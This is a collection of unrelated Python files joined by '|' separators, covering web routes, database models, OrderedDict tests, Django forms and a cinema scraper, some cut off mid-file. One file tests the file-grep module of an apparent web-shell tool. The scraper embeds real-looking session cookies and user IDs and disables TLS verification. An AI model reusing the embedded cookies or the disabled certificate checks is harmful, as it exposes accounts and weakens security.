true_masks = get_true_mask(data[index])
show(index, img_path, true_masks)
index = None
if len(sys.argv) > 1:
if (sys.argv[1].isdigit()):
index = eval(sys.argv[1])
if (index == None):
print("Usage: python show_mask.py [0-99]")
else:
show_mask(str(index))
|
from fastapi.testclient import TestClient
from app.main import app
client = TestClient(app)
def test_read_docs():
response = client.get("/docs")
assert response.status_code == 200
|
from testfixtures import log_capture
from testsuite.base_fs import BaseFilesystem
from testsuite import config
from core.sessions import SessionURL
from core import modules
from core import utilities
from core import messages
import core.utilities
import subprocess
import os
class FileGrep(BaseFilesystem):
def setUp(self):
self.session = SessionURL(
self.url,
self.password,
volatile = True
)
modules.load_modules(self.session)
# Create the folder tree
self.folders_abs, self.folders_rel = self.populate_folders()
self.files_abs, self.files_rel = self.populate_files(
self.folders_abs,
[ 'string1', 'string12', 'string3', 'string4' ],
[ 'string1', 'string12', 'string3', 'string4' ]
)
# Change mode of the third file to ---x--x--x 0111 execute
subprocess.check_call(
config.cmd_env_chmod_s_s % ('0111', self.files_abs[3]),
shell=True)
self.run_argv = modules.loaded['file_grep'].run_argv
def tearDown(self):
# Reset recursively all the permissions to 0777
subprocess.check_call(
config.cmd_env_chmod_s_s % ('-R 0777', self.folders_abs[0]),
shell=True)
for folder in reversed(self.folders_abs):
subprocess.check_call(
config.cmd_env_remove_s % (self.files_abs.pop()),
shell=True)
subprocess.check_call(
config.cmd_env_rmdir_s % (folder),
shell=True)
def test_file_grep_php(self):
# grep string1 -> string[0]
self.assertEqual(
self.run_argv([ self.folders_rel[0], 'tring1' ]),
{
self.files_rel[0] : ['string1'],
self.files_rel[1] : ['string12']
}
)
# grep string3 -> []
self.assertEqual(self.run_argv([ self.folders_rel[0], 'tring4' ]),{})
# grep string[2-9] -> string[3]
self.assertEqual(self.run_argv([ self.folders_rel[0], 'tring[2-9]' ]),{ self.files_rel[2] : ['string3'] })
# grep rpath=folder2 string -> string[3]
self.assertEqual(self.run_argv([ self.folders_rel[2], 'string.*' ]),{ self.files_rel[2] : ['string3'] })
def test_file_grep_sh(self):
# grep string1 -> string[0]
self.assertEqual(
self.run_argv([ '-vector', 'grep_sh', self.folders_rel[0], 'tring1' ]),
{
self.files_rel[0] : ['string1'],
self.files_rel[1] : ['string12']
}
)
# grep string3 -> []
self.assertEqual(self.run_argv([ '-vector', 'grep_sh', self.folders_rel[0], 'tring4' ]),{})
# grep string[2-9] -> string[3]
self.assertEqual(self.run_argv([ '-vector', 'grep_sh', self.folders_rel[0], 'tring[2-9]' ]),{ self.files_rel[2] : ['string3'] })
# grep rpath=folder2 string -> string[3]
self.assertEqual(self.run_argv([ '-vector', 'grep_sh', self.folders_rel[2], 'string.*' ]),{ self.files_rel[2] : ['string3'] })
@log_capture()
def test_php_err(self, log_captured):
# wrong rpath generate None and warning print
self.assertEqual(self.run_argv([ 'bogus', 'tring4' ]), None)
self.assertEqual(messages.module_file_grep.failed_retrieve_info,
log_captured.records[-1].msg)
# wrong regex generate None and warning print
self.assertEqual(self.run_argv([ '\'', 'tring4' ]), None)
self.assertEqual(messages.module_file_grep.failed_retrieve_info,
log_captured.records[-1].msg)
@log_capture()
def test_sh_err(self, log_captured):
# wrong rpath generate None and warning print
self.assertEqual(self.run_argv([ '-vector', 'grep_sh', 'bogus', 'tring4' ]), None)
self.assertEqual(messages.module_file_grep.failed_retrieve_info,
log_captured.records[-1].msg)
# wrong regex generate None and warning print
self.assertEqual(self.run_argv([ '-vector', 'grep_sh', '\'', 'tring4' ]), None)
self.assertEqual(messages.module_file_grep.failed_retrieve_info,
log_captured.records[-1].msg)
|
import requests
import simple.config3
# print(simple.config3.obj.Headers())
headers = simple.config3.obj.Headers()
print(headers)
|
# -*- coding: utf-8 -*-
from bottle import route,request
from siteglobals import env, db, config
from utils import *
from backend import Record
@route('/details', method='GET')
def output():
try:
session = db.sessionmaker()
id = getSingleField( 'id', request )
if not id:
raise ElementNotFoundException( id )
record = session.query( Record ).filter( Record.id == id ).one()
if not record:
raise ElementNotFoundException( id )
upload_dir = config.get('site','uploads')
ret = env.get_template('details.html').render( record=record, upload_dir=upload_dir )
session.close()
return ret
except Exception, m:
return env.get_template('error.html').render(err_msg=str(m))
|
from mapyourcity import db
from werkzeug.security import generate_password_hash, check_password_hash
from datetime import datetime
# COMMENTS
class Player(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
username = db.Column(db.String(25), unique=True)
email = db.Column(db.String(120), unique=True)
description = db.Column(db.String(250))
pw_hash = db.Column(db.String(160))
created_at = db.Column(db.Date())
last_login = db.Column(db.Date())
lang_short = db.Column(db.String(10))
avatar = db.Column(db.String(30))
color = db.Column(db.String(10))
home_region = db.Column(db.String(80))
#actual_region = db.Column(db.String(80))
is_ready = db.Column(db.Boolean)
lat = db.Column(db.Float)
lng = db.Column(db.Float)
country = db.Column(db.String(80))
osm_login = db.Column(db.String(50), unique=True)
osm_hash = db.Column(db.String(160))
latlng = db.Column(db.String(36), unique=False) #aktuelle koordinaten
game_id = db.Column(db.Integer, db.ForeignKey('game.id'))
game = db.relationship('Game', backref=db.backref('players', lazy='dynamic'))
score_id = db.Column(db.Integer, db.ForeignKey('scores.id'))
score = db.relationship('Scores', backref=db.backref('players', lazy='dynamic'))
theme = db.Column(db.String(15))
team_id = db.Column(db.Integer, db.ForeignKey('team.id'))
team = db.relationship('Team', backref=db.backref('players', lazy='dynamic'))
def __init__(self, username, email, password):
self.username = username
self.email = email
self.pw_hash = self.get_hash(password)
self.created_at = datetime.now()
self.last_login = datetime.now()
self.score = Scores(self.username,self.id)
self.is_ready =False
def get_hash(self, password):
return generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.pw_hash, password)
def set_avatar(self, avatar='default'):
self.avatar = avatar
def set_description(self, description):
self.description = description
def set_color(self, color):
self.color = color
def set_position(self, lat,lng):
self.lat = lat
self.lng = lng
def set_actual_region(self, actual_region):
self.actual_region = actual_region
def set_home_region(self, home_region):
self.home_region = home_region
def get_country(self, region):
self.country = Regions.query.filter_by(regionname = region).first()
def connect_osm(self, login, password):
self.osm_login = login
self.osm_hash = hash_password(password)
def set_language(self, lang_short):
self.lang_short = lang_short
def set_username(self, username):
self.username = username
def set_email(self, email):
self.email = email
def set_last_login(self):
self.last_login = datetime.now()
def set_ready(self):
self.is_ready = True
def __repr__(self):
'<Player %r>' % (self.username)
# COMMENTS
class Scores(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(25), unique=True)
user_id = db.Column(db.Integer, unique=True)
score_all = db.Column(db.Integer)
score_game = db.Column(db.Integer)
score_week = db.Column(db.Integer)
created_at = db.Column(db.Date())
updated_at = db.Column(db.Date())
def __init__(self, username, user_id): #Wird nur einemal ausgefuehrt, wenn Spieler registriert wird
self.username = username
self.user_id = user_id
self.score_all = 0
self.score_game = 0
self.score_week = 0
self.created_at = datetime.now()
self.updated_at = datetime.now()
def init_score_game(self): #Zum reseten des currentGame Scores
self.score_game = 0
def init_score_week(self): #Zum resetten der temporaeren Scores
self.score_week = 0
def update(self, score):
self.score_all += score
self.score_game += score
self.score_week += score
self.updated_at = datetime.now()
def __repr__(self):
'<Score %r>' % (self.username)
# COMMENTS
class Game(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
player_id = db.Column(db.Integer)
region = db.Column(db.String(25))
game_type = db.Column(db.Integer) #1=Singleplayer/2=Multiplayer
game_mode = db.Column(db.String(25)) #FFA/MapperOfTheWeek/...
object_restaurant = db.Column(db.Boolean)
object_bar = db.Column(db.Boolean)
object_bank = db.Column(db.Boolean)
radius = db.Column(db.Integer)
session_start = db.Column(db.Date())
session_end = db.Column(db.Date())
session_status = db.Column(db.String(20))
is_active = db.Column(db.Boolean)
gamempffa_id = db.Column(db.Integer, db.ForeignKey('game_mp_ffa.id'))
gamempffa = db.relationship('Game_mp_ffa', backref=db.backref('games', lazy='dynamic'))
def __init__(self, player_id, region, game_type, game_mode):
self.player_id = player_id
self.region = region
self.game_type = game_type
self.game_mode = game_mode
self.session_start = datetime.now()
self.session_status = 'started'
self.is_active = True
def set_objecttypes(self, restaurant, bar, bank):
self.object_restaurant = restaurant
self.object_bar = bar
self.object_bank = bank
def set_radius(self, radius):
self.radius = radius
def close_game(self):
self.session_status = 'game closed'
self.is_active=False
def __repr__(self):
'<Game %r>' % (self.player_id)
# COMMENTS
class Game_mp_ffa(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
name = db.Column(db.String(25))
duration = db.Column(db.Integer)
pw_hash = db.Column(db.String(160))
max_players = db.Column(db.Integer)
num_teams = db.Column(db.Integer)
def __init__(self, name, duration, password, num_teams, max_players, verify_wheelchair, verify_smoking, verify_vegetarian, object_restaurant, object_bar, object_bank):
self.name = name
self.duration = duration
self.pw_hash = self.get_hash(password)
self.max_players = max_players
self.num_teams = num_teams
self.object_restaurant = object_restaurant
self.object_bar = object_bar
self.object_bank = object_bank
def get_hash(self, password):
return generate_password_hash(password)
def check_password(self,password):
return check_password_hash(self.pw_hash, password)
def __repr__(self):
'<SP Game Info %r>' % (self.session_id)
# COMMENTS
class Team(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
game_id = db.Column(db.Integer)
playerscount = db.Column(db.Integer)
name = db.Column(db.String(50))
color = db.Column(db.String(7))
game_id = db.Column(db.Integer, db.ForeignKey('game.id'))
game = db.relationship('Game', backref=db.backref('teams', lazy='dynamic'))
teamscore = db.Column(db.Integer)
def __init__(self, game_id, name, color, game):
self.game_id = game_id
self.name = name
self.color = color
self.game = game
self.playerscount=0
def update_playerscount(self):
self.playerscount+=1
#def update_teamscore(self, id, score):
def __repr__(self):
'<Team %r>' % (self.name)
# COMMENTS
class TeamPlayer(db.Model):
team_id = db.Column(db.Integer, primary_key=True)
player_id = db.Column(db.Integer)
def __init__(self, team_id, player_id):
self.team_id = team_id
self.player_id = player_id
def __repr__(self):
'<Team Player %r>' % (self.player_id)
# COMMENTS
class History(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
game_id = db.Column(db.Integer, db.ForeignKey('game.id'))
player_id = db.Column(db.Integer)
score = db.Column(db.Integer)
event_type = db.Column(db.String(15)) # badge, osm, social
timestamp = db.Column(db.Date())
def __init__(self, game_id, player_id, event_type):
self.score = 1 # set dynamically
self.game_id = game_id
self.player_id = player_id
self.event_type = event_type
self.timestamp = datetime.now()
#def __repr__(self):
# '<History Scores %r %r>' % (self.game_id, self.player_id)
# COMMENTS
class HistoryGeo(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True) # relate with Scores.id
object_id = db.Column(db.String(25))
object_name = db.Column(db.String(150))
object_type = db.Column(db.String(50))
object_attributes = db.Column(db.String(150))
object_latlng = db.Column(db.String(36), unique=False)
def __init__(self, history_id, object_id, object_name, object_type, object_attribute, object_latlng):
self.id = history_id
self.object_id = object_id
self.object_name = object_name
self.object_type = object_type
self.object_attributes = object_attribute
self.object_latlng = object_latlng
def __repr__(self):
'<History Geoobjects %r>' % (self.object_id)
# COMMENTS
class HistoryBadges(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
badge_id = db.Column(db.Integer)
def __init__(self, badge_id):
self.badge_id = badge_id
def __repr__(self):
'<History Badges %r>' % (self.badge_id)
# COMMENTS
class HistorySocial(db.Model):
id = db.Column(db.Integer, primary_key=True, unique=True)
social_type = db.Column(db.String(50))
description = db.Column(db.String(500))
def __init__(self, social_type):
self.social_type = social_type
def __repr__(self):
'<History Social %r>' % (self.social_type)
# COMMENTS
class SettingsGameModes(db.Model):
name_short = db.Column(db.String(25), primary_key=True, unique=True)
name_long = db.Column(db.String(25), primary_key=True, unique=True)
game_type = db.Column(db.String(25))
def __init__(self, name_short, name_long, game_type):
self.name_short = name_short
self.name_long = name_long
self.game_type = game_type
def __repr__(self):
'<Settings Gamemodes %r>' % (self.name_short)
# COMMENTS
class Regions(db.Model):
region_short = db.Column(db.String(25), primary_key=True, unique=True)
region_full = db.Column(db.String(120), unique=True)
country_short = db.Column(db.String(5))
country_full = db.Column(db.String(100))
def __init__(self, region_short, region_full, country_short, country_full):
self.region_short = region_short
self.region_full = region_full
self.country_short = country_short
self.country_full = country_full
def __repr__(self):
'<Regions %r>' % (self.region_short)
# COMMENTS
class Badges(db.Model):
badge_id = db.Column(db.Integer, primary_key=True, unique=True)
score = db.Column(db.Integer)
name = db.Column(db.String(25), unique=True)
image = db.Column(db.String(25), unique=True)
def __init__(self, score, name, image):
self.score = score
self.name = name
self.image = image
def __repr__(self):
'<Badges %r>' % (self.name)
# COMMENTS
class OsmObjects(db.Model):
title = db.Column(db.String(35), primary_key=True, unique=True)
full_name = db.Column(db.String(50))
description = db.Column(db.String(300))
osm_page = db.Column(db.String(100))
verify_wheelchair = db.Column(db.Boolean)
verify_opening_hours = db.Column(db.Boolean)
verify_smoking = db.Column(db.Boolean)
verify_vegan = db.Column(db.Boolean)
verify_vegetarian = db.Column(db.Boolean)
verify_kitchen = db.Column(db.Boolean)
verify_shelter = db.Column(db.Boolean)
verify_bench = db.Column(db.Boolean)
verify_bin = db.Column(db.Boolean)
def __init__(self, title, full_name):
self.title = title
self.full_name = full_name
def __repr__(self):
'<OSM Objects %r>' % (self.title)
# COMMENTS
class ScheduleSpMotw(db.Model):
week_id = db.Column(db.Integer, primary_key=True, unique=True)
object_type = db.Column(db.String(25)) # save as string for better reproducability
time_start = db.Column(db.Date())
time_end = db.Column(db.Date())
area = db.Column(db.String(25)) # store as string => world/<country>/<region>
def __init__(self, object_type, time_start, time_end, area):
self.object_type = object_type
self.time_start = time_start
self.time_end = time_end
self.area = area
def __repr__(self):
'<Schedule MOTW %r>' % (self.time_start)
|
# notify.py
# Copyright (C) 2011-2014 Andrew Svetlov
# andrew.svetlov@gmail.com
#
# This module is part of BloggerTool and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import asyncore
import pyinotify
from bloggertool.log_util import class_logger
class EventProcessor(pyinotify.ProcessEvent):
log = class_logger()
def my_init(self, main):
self.main = main
def process_default(self, event):
try:
for path, cb, args, kwargs in self.main.handlers:
if event.pathname == path:
cb(*args, **kwargs)
except Exception:
self.log.exception("In notifier event handling")
class Notifier(object):
def __init__(self, root):
self.watch_manager = pyinotify.WatchManager()
self.notifier = pyinotify.AsyncNotifier(
self.watch_manager,
default_proc_fun=EventProcessor(main=self))
self.handlers = []
events = pyinotify.IN_ATTRIB | pyinotify.IN_MODIFY
self.watch_manager.add_watch(root, events, rec=True)
def add(self, path, cb, *args, **kwargs):
params = (path, cb, args, kwargs)
self.handlers.append(params)
def loop(self):
asyncore.loop()
|
def get_data(path=''):
"""Gets content of each file in path and adds it to list. Returns list with files contents"""
import os
import re
import string
documents = []
for filename in os.listdir(path):
with open(os.path.join(path, filename), encoding="utf-8") as f:
file_contents = ''.join(f.readlines()).replace('\n', '')
documents.append(file_contents)
return documents |
from abc import ABC, abstractmethod
class Algorithm(ABC):
"""Base class for all machine learning algorithms.
This class provides a easy way to use different ML algorithms transparently.
"""
@abstractmethod
def fit(self):
"""Should implement the algorithms training procedure."""
pass
@abstractmethod
def evaluate(self, data, labels):
"""Should implement the algorithms evaluation procedure"""
pass
@abstractmethod
def predict(self, data):
"""Should implement the algorithms prediction procedure"""
pass
@abstractmethod
def save(self, filepath):
"""Should implement the functionality to save a trained algorithm"""
@abstractmethod
def load(self, filepath):
"""Should implement the functionality to load a saved algorithm"""
@abstractmethod
def check_data(self, data, labels):
"""Should impolement functionality to check compatibility of data for the specific architecutre"""
|
def task1():
s1 = '00014402', 'Sam', 'Tashkent'
s2 = '00014403', 'Said', 'London'
print(s1 < s2)
def task2():
|
# 1. scope
x = 5
def carp():
# 2. scope
global t
t = 50
carp()
print(t)
|
# -*- coding: utf-8 -*-
"""
Author: Lily
Date: 2018-09-13
QQ: 339600718
中影国际影城 China Film ChinaFilm-s
抓取思路:在首页获取每个城市的code,根据获取到的code做为参数,获取每个城市的具体数据
URL(获取城市的code):http://m.cfc.com.cn/?code=031GOyP82mrnFE0LmeP82CuyP82GOyPv&state=123
URL(每个城市的数据)http://m.cfc.com.cn/cinema/index.html?cityCode=320100
注意:抓取到的数据有不同的影院,有些不是中影国际影城,可能是院线。
"""
import requests
from bs4 import BeautifulSoup
import re
import datetime
from lxml import etree
from time import sleep
header = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,image/wxpic,image/sharpp,image/apng,*/*;q=0.8'
, 'Cookie':'BIGipServerm.cfc.com.cn-h5=1348774080.20480.0000; JSESSIONID=6B0CFFE09DEC7F2BD4D95FD53F19CEBD; testKey=oEa9M02mmiTZhvlNUTJtQdAVkxBs; _openId_=oEa9M02mmiTZhvlNUTJtQdAVkxBs; _userId_=675331027835308568; _mobile_=; _user_outSystem_key_=97828efb5d20c1c3cec20eda1e5d42e5; Hm_lvt_917df978a7e1880491a42d7fddf13ae8=1536804691; Hm_lpvt_917df978a7e1880491a42d7fddf13ae8=1536828383' ,
'User-Agent': 'Mozilla/5.0 (Linux; Android 5.1.1; vivo X7 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044207 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x2607023A) NetType/WIFI Language/zh_CN'}
url = 'http://m.cfc.com.cn/?code=031GOyP82mrnFE0LmeP82CuyP82GOyPv&state=123'
url_store = 'http://m.cfc.com.cn/cinema/index.html?cityCode='
city_html = requests.get(url).text
soup_city = BeautifulSoup(city_html,'lxml')
citys = soup_city.find_all(name='tt')
filename = "ChinaFilm-s"+re.sub(r'[^0-9]', '', str(datetime.datetime.now())) + '.csv'
f = open(filename, 'w', encoding='utf-8')
f.write('citycode,city,name,address,phone'+'\n')
for c in citys:
print(c)
city = c.div.string
citycode = c['cityno']
print(citycode)
try:
store_html = requests.post(url_store+str(citycode), headers=header, verify=False).text
sleep(5)
# print(store_html)
store_html = etree.HTML(store_html)
# print(type(store_html))
stores = store_html.xpath('//div[@id="city_hide_flag"]/a')
# print(stores)
total = len(stores)
# print(total)
for i in range(total):
# print(i)
# print('//div[@id="ity_hide_flag"]/a['+str(i+1)+']/div[@class="item"]/div/div/text()')
name = store_html.xpath('//div[contains(@id,"ity_hide_flag")]/a['+str(i+1)+']/div/div/div/text()')
address = store_html.xpath('//div[contains(@id,"ity_hide_flag")]/a[' + str(i + 1) + ']/div/p[1]/samp/text()')
phone = store_html.xpath('//div[contains(@id,"ity_hide_flag")]/a[' + str(i + 1) + ']/div/p[2]/samp/text()')
# print(name,address,phone)
f.write(citycode+','+city+','+name[0]+','+address[0]+','+phone[0]+','+'\n')
except:
print('无数据')
f.close()
|
import torch
import numpy
import gym
class HandDesignedSampler:
"""
Uniformly samples the input space of an env.
"""
def __init__(self, env, idm):
print('building sampler')
self.env = env
self.skill_dict = [(1, False), (0, False), (-1, False), (1, True), (0, True), (-1, True), (1, 0), (0, 0), (-1, 0), (1.0, 0)]
self.idm = idm
print('built sampler')
def sample(self, state, n_contexts, n_steps):
s = self.env.ego_state.clone()
obs = self.env.observation
samples = []
for i in range(n_contexts):
self.env.ego_state = state.clone()
acts = []
states = []
aidx = self.skill_dict[i]
for n in range(n_steps):
if type(aidx[1]) == bool:
a = self.idm.forward_adj(obs.unsqueeze(0), left=aidx[1]).mean.squeeze()
a[0] += aidx[0]
else:
a = self.idm.action(obs, deterministic=True)
self.env.step(a)
s_new = self.env.ego_state.clone()
obs = self.env.observation
acts.append(a)
states.append(s_new)
samples.append((states, acts))
self.env.ego_state = s
return samples
|
# Most of these tests have been adapted from the stdlib OrderedDict tests.
from collections import MutableMapping
import copy
from operator import itemgetter
import pickle
from random import shuffle
import sys
from test import mapping_tests
import pytest
from schematics.common import PY2, PY3
from schematics.datastructures import OrderedDict
class GeneralMappingTests(mapping_tests.BasicTestMappingProtocol):
type2test = OrderedDict
def test_popitem(self):
d = self._empty_mapping()
with pytest.raises(KeyError):
d.popitem()
class MyOrderedDict(OrderedDict):
pass
class SubclassMappingTests(mapping_tests.BasicTestMappingProtocol):
type2test = MyOrderedDict
def test_popitem(self):
d = self._empty_mapping()
with pytest.raises(KeyError):
d.popitem()
def test_init():
with pytest.raises(TypeError):
OrderedDict([('a', 1), ('b', 2)], None) # too many args
pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
assert sorted(OrderedDict(dict(pairs)).items()) == pairs # dict input
assert sorted(OrderedDict(**dict(pairs)).items()) == pairs # kwds input
assert list(OrderedDict(pairs).items()) == pairs # pairs input
assert list(OrderedDict(
[('a', 1), ('b', 2), ('c', 9), ('d', 4)], c=3, e=5).items()) == pairs # mixed input
# make sure no positional args conflict with possible kwdargs
if PY2 and sys.version_info >= (2, 7, 1) or PY3 and sys.version_info >= (3, 2):
assert list(OrderedDict(self=42).items()) == [('self', 42)]
assert list(OrderedDict(other=42).items()) == [('other', 42)]
with pytest.raises(TypeError):
OrderedDict(42)
with pytest.raises(TypeError):
OrderedDict((), ())
with pytest.raises(TypeError):
OrderedDict.__init__()
# Make sure that direct calls to __init__ do not clear previous contents
d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
d.__init__([('e', 5), ('f', 6)], g=7, d=4)
assert (list(d.items()) ==
[('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
def test_update():
with pytest.raises(TypeError):
OrderedDict().update([('a', 1), ('b', 2)], None) # too many args
pairs = [('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5)]
od = OrderedDict()
od.update(dict(pairs))
assert sorted(od.items()) == pairs # dict input
od = OrderedDict()
od.update(**dict(pairs))
assert sorted(od.items()) == pairs # kwds input
od = OrderedDict()
od.update(pairs)
assert list(od.items()) == pairs # pairs input
od = OrderedDict()
od.update([('a', 1), ('b', 2), ('c', 9), ('d', 4)], c=3, e=5)
assert list(od.items()) == pairs # mixed input
# Issue 9137: Named argument called 'other' or 'self'
# shouldn't be treated specially.
if PY2 and sys.version_info >= (2, 7, 1) or PY3 and sys.version_info >= (3, 2):
od = OrderedDict()
od.update(self=23)
assert list(od.items()) == [('self', 23)]
od = OrderedDict()
od.update(other={})
assert list(od.items()) == [('other', {})]
od = OrderedDict()
od.update(red=5, blue=6, other=7, self=8)
assert sorted(list(od.items())) == [('blue', 6), ('other', 7), ('red', 5), ('self', 8)]
# Make sure that direct calls to update do not clear previous contents
# add that updates items are not moved to the end
d = OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 44), ('e', 55)])
d.update([('e', 5), ('f', 6)], g=7, d=4)
assert (list(d.items()) ==
[('a', 1), ('b', 2), ('c', 3), ('d', 4), ('e', 5), ('f', 6), ('g', 7)])
with pytest.raises(TypeError):
OrderedDict().update(42)
with pytest.raises(TypeError):
OrderedDict().update((), ())
with pytest.raises(TypeError):
OrderedDict.update()
def test_abc():
assert isinstance(OrderedDict(), MutableMapping)
assert issubclass(OrderedDict, MutableMapping)
def test_clear():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
assert len(od) == len(pairs)
od.clear()
assert len(od) == 0
def test_delitem():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
del od['a']
assert 'a' not in od
with pytest.raises(KeyError):
del od['a']
assert list(od.items()) == pairs[:2] + pairs[3:]
def test_setitem():
od = OrderedDict([('d', 1), ('b', 2), ('c', 3), ('a', 4), ('e', 5)])
od['c'] = 10 # existing element
od['f'] = 20 # new element
assert (list(od.items()) ==
[('d', 1), ('b', 2), ('c', 10), ('a', 4), ('e', 5), ('f', 20)])
@pytest.mark.parametrize('f', [lambda x: x, reversed])
def test_iterators(f):
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
assert list(f(od)) == [t[0] for t in f(pairs)]
assert list(f(od.keys())) == [t[0] for t in f(pairs)]
assert list(f(od.values())) == [t[1] for t in f(pairs)]
assert list(f(od.items())) == list(f(pairs))
def test_popitem():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
while pairs:
assert od.popitem() == pairs.pop()
with pytest.raises(KeyError):
od.popitem()
assert len(od) == 0
def test_pop():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
shuffle(pairs)
while pairs:
k, v = pairs.pop()
assert od.pop(k) == v
with pytest.raises(KeyError):
od.pop('xyz')
assert len(od) == 0
assert od.pop(k, 12345) == 12345
# make sure pop still works when __missing__ is defined
class Missing(OrderedDict):
def __missing__(self, key):
return 0
m = Missing(a=1)
assert m.pop('b', 5) == 5
assert m.pop('a', 6) == 1
assert m.pop('a', 6) == 6
with pytest.raises(KeyError):
m.pop('a')
def test_equality():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od1 = OrderedDict(pairs)
od2 = OrderedDict(pairs)
assert od1 == od2 # same order implies equality
pairs = pairs[2:] + pairs[:2]
od2 = OrderedDict(pairs)
assert od1 != od2 # different order implies inequality
# comparison to regular dict is not order sensitive
assert od1 == dict(od2)
assert dict(od2) == od1
# different length implied inequality
assert od1 != OrderedDict(pairs[:-1])
def test_copying():
# Check that ordered dicts are copyable, deepcopyable, picklable,
# and have a repr/eval round-trip
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
def check(dup):
assert dup is not od
assert dup == od
check(od.copy())
check(copy.copy(od))
check(copy.deepcopy(od))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
check(pickle.loads(pickle.dumps(od, proto)))
check(eval(repr(od)))
update_test = OrderedDict()
update_test.update(od)
check(update_test)
check(OrderedDict(od))
def test_yaml_linkage():
# Verify that __reduce__ is setup in a way that supports PyYAML's dump() feature.
# In yaml, lists are native but tuples are not.
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
# yaml.dump(od) -->
# '!!python/object/apply:__main__.OrderedDict\n- - [a, 1]\n - [b, 2]\n'
assert all(type(pair)==list for pair in od.__reduce__()[1][0])
def test_reduce_not_too_fat():
# do not save instance dictionary if not needed
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
od = OrderedDict(pairs)
assert od.__reduce__()[2] is None
od.x = 10
assert od.__reduce__()[2] is not None
@pytest.mark.skipif(PY2, reason='CPython issue #17900')
def test_pickle_recursive():
od = OrderedDict()
od['x'] = od
rec = pickle.loads(pickle.dumps(od))
assert list(od.keys()) == list(rec.keys())
assert od is not rec
assert rec['x'] is rec
def test_repr():
od = OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])
assert (repr(od) ==
"OrderedDict([('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)])")
assert eval(repr(od)) == od
assert repr(OrderedDict()) == "OrderedDict()"
def test_repr_recursive():
# See issue #9826
od = OrderedDict.fromkeys('abc')
od['x'] = od
assert repr(od) == "OrderedDict([('a', None), ('b', None), ('c', None), ('x', ...)])"
def test_setdefault():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffle(pairs)
od = OrderedDict(pairs)
pair_order = list(od.items())
assert od.setdefault('a', 10) == 3
# make sure order didn't change
assert list(od.items()) == pair_order
assert od.setdefault('x', 10) == 10
# make sure 'x' is added to the end
assert list(od.items())[-1] == ('x', 10)
# make sure setdefault still works when __missing__ is defined
class Missing(OrderedDict):
def __missing__(self, key):
return 0
assert Missing().setdefault(5, 9) == 9
def test_reinsert():
# Given insert a, insert b, delete a, re-insert a,
# verify that a is now later than b.
od = OrderedDict()
od['a'] = 1
od['b'] = 2
del od['a']
od['a'] = 1
assert list(od.items()) == [('b', 2), ('a', 1)]
def test_move_to_end():
od = OrderedDict.fromkeys('abcde')
assert list(od) == list('abcde')
od.move_to_end('c')
assert list(od) == list('abdec')
od.move_to_end('c', 0)
assert list(od) == list('cabde')
od.move_to_end('c', 0)
assert list(od) == list('cabde')
od.move_to_end('e')
assert list(od) == list('cabde')
with pytest.raises(KeyError):
od.move_to_end('x')
def test_override_update():
# Verify that subclasses can override update() without breaking __init__()
class MyOD(OrderedDict):
def update(self, *args, **kwds):
raise Exception()
items = [('a', 1), ('c', 3), ('b', 2)]
assert list(MyOD(items).items()) == items
def test_sort():
pairs = [('c', 1), ('b', 2), ('a', 3), ('d', 4), ('e', 5), ('f', 6)]
shuffled = pairs[:]
shuffle(shuffled)
od = OrderedDict(shuffled)
od.sort(key=itemgetter(1))
assert list(od.items()) == pairs
shuffle(shuffled)
od = OrderedDict(shuffled)
od.sort()
assert list(od.items()) == list(sorted(pairs))
shuffle(shuffled)
od = OrderedDict(shuffled)
od.sort(reverse=True)
assert list(od.items()) == list(reversed(sorted(pairs)))
|
from django import forms
class LoginForm(forms.Form):
# 登录表单数据检验
username = forms.CharField(required=True, min_length=4, max_length=10,
error_messages={
'require': '用户名不能为空!',
'min_length': '用户名不能少于4个字符!',
'max_length': '用户名最多不能超过10个字符!'
})
password = forms.CharField(required=True, min_length=6, max_length=16,
error_messages={
'require': '密码不能为空!',
'min_length': '密码不能少于6位!',
'max_length': '密码不能超过16位!'
})
class RegisterForm(forms.Form):
# 注册表单验证
username = forms.CharField(required=True, min_length=4, max_length=10,
